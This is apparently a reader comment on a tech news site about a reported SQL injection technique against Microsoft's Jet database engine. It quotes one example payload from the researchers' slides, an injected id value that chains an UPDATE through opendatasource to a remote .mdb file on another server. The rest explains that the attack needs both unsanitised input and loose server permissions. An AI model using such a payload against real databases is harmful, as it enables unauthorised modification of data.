Interesting
I looked at their slides. It's a real sql injection attack, like all such attacks it requires not sanitizing the input parameter. One example they give
sql="select * from persons where personid="&id
id="1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0','data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;"
So if someone codes a client that allows sql injection (not that anybody ever does that), and someone else codes a server to not restrict the database application permissions outside of the database itself (not that anybody ever does that), then the jet engine allows all kinds of selects and updates on various kinds of "data sources" on the server. Or as in their example, even on a different server, assuming the database application runs in a context that has permissions there.
The MS Access angle is a red herring. It's more a jet engine vulnerability. I can understand why Microsoft is not too upset about it. It requires a coding error on the client *and* a permissions error on the server. But the authors are correct there probably a lot of setups like that.
Biting the hand that feeds IT
